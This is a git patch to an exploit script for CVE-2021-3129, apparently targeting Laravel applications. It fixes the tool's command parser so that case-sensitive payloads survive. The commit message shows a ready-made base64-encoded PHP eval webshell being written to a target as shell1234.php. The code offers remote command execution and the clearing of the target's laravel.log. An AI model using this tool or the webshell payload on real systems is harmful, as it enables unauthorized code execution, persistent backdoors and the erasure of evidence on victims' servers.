From 4d7d2128a45157e62e3ff4c4e10b2eb1a2f9b804 Mon Sep 17 00:00:00 2001
From: Crilwa <91417969+cri1wa@users.noreply.github.com>
Date: Tue, 21 Mar 2023 17:24:17 +0800
Subject: [PATCH] fix:The problem of input character case
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Command execution cannot handle uppercase characters and cannot write to a webshell with uppercase characters，例如，”execute echo PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== | base64 -d > shell1234.php“
---
 CVE-2021-3129.py | 24 ++++++++++++++----------
 1 file changed, 14 insertions(+), 10 deletions(-)

diff --git a/CVE-2021-3129.py b/CVE-2021-3129.py
index d274905..657d9f1 100644
--- a/CVE-2021-3129.py
+++ b/CVE-2021-3129.py
@@ -70,20 +70,24 @@ def start(self):
 
     def ask_command(self):
         response = input(f"{PURPLE}[?] Please enter a command to execute: {END}")
-
-        response = response.lower()
-        if response == "?" or response == "help":  # Return list of commands
+        response_list = response.split(" ",1)
+        command = response_list[0].lower()
+        if(len(response_list) == 2):
+            payload = response_list[1]
+        else:
+            payload = "null"
+        if command == "?" or command == "help":  # Return list of commands
             self.cmd_help()
-        elif response == "exit":  # Stop script
+        elif command == "exit":  # Stop script
             exit()
-        elif response == "clear_logs":  # Attempt to clear laravel.log of target
+        elif command == "clear_logs":  # Attempt to clear laravel.log of target
             self.cmd_clear_logs()
-        elif response[0:7] == "execute":  # Attempt to execute system command on target
-            self.cmd_execute_cmd(response[8:])
-        elif response[0:5] == "write":  # Attempt to write to the log file of target
-            self.cmd_execute_write(response[6:])
+        elif command == "execute":  # Attempt to execute system command on target
+            self.cmd_execute_cmd(payload)
+        elif command == "write":  # Attempt to write to the log file of target
+            self.cmd_execute_write(payload)
         else:
-            print(RED + f"[!] No command found named \"{response}\".")
+            print(RED + f"[!] No command found named \"{command}\".")
 
         self.ask_command()